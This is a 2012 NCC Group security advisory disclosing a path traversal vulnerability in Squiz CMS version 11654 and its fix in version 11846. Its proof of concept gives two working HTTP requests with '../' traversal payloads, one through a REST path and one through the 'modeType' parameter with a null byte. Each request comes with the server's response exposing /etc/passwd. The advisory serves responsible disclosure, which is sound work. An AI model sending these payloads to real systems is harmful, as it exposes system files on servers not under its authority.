Squiz CMS 11654 File Path Traversal

`=======  
Summary  
=======  
Name: Squiz CMS - File Path Traversal  
Release Date: 30 November 2012  
Reference: NGS00330  
Discoverer: Robert Ray <[email protected]>  
Vendor: Squiz  
Vendor Reference: 11846  
Systems Affected: Squiz CMS V11654   
Risk: High  
Status: Published  
  
========  
TimeLine  
========  
Discovered: 29 June 2012  
Released: 29 June 2012  
Approved: 2 July 2012  
Reported: 9 July 2012  
Fixed: 9 August 2012  
Published: 30 November 2012  
  
===========  
Description  
===========  
Squiz CMS V11654 - File Path Traversal  
  
I. VULNERABILITY  
-------------------------  
The open source platform Squiz CMS version 11654 is vulnerable to file path traversal attacks allowing authenticated attackers to gain access to arbitrary system files.  
  
II. BACKGROUND  
-------------------------  
Squiz CMS is an open source content management system used by a number of sectors around the globe including Charities, Associations & Not For Profit, Corporate, Finance & Professional Services, Cultural Institutions, Education, Government & Public Sector, Health & Social Services, Media &  
Publishing, Travel & Tourism etc.  
  
http://www.squiz.co.uk/showcase/  
  
III. DESCRIPTION  
-------------------------  
Directory traversal has been found and confirmed within the software as an authenticated user. In some cases it is possible for users to self register within the software if configured for this use case.  
  
=================  
Technical Details  
=================  
IV. PROOF OF CONCEPT  
-------------------------  
  
The vulnerabilities detected include method by means of a REST parameter:  
  
GET /__web/Systems/UnregisteredDomainWidget/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1  
Host: cmsdemo.squiz.net  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101  
Firefox/13.0.1  
Accept: */*  
Accept-Language: en,en-us;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4  
  
HTTP/1.1 200 OK  
Content-type: application/octet-stream  
Expires: Sun, 1 Jul 2012 00:00:00  
Last-Modified: Sat, 30 Jun 2012 00:00:00  
Content-Length: 1236  
Date: Fri, 29 Jun 2012 21:46:36 GMT  
Server: lighttpd/1.4.28  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
  
And also by means of the "modeType" GET parameter.  
  
GET /_edit?modeType=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1  
Host: cmsdemo.squiz.net  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101  
Firefox/13.0.1  
Accept: */*  
Accept-Language: en,en-us;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
X-Requested-With: XMLHttpRequest  
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4  
  
HTTP/1.1 200 OK  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Content-type: text/html; charset=UTF-8  
Date: Fri, 29 Jun 2012 19:56:11 GMT  
Server: lighttpd/1.4.28  
Content-Length: 1236  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
  
===============  
Fix Information  
===============  
The vendor has released an update to address this issue. Fixed in version  
11846.  
  
http://cms.squizsuite.net/download   
  
  
NCC Group Research  
http://www.nccgroup.com/research  
  
  
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>  
This email message has been delivered safely and archived online by Mimecast.  
</a>  
`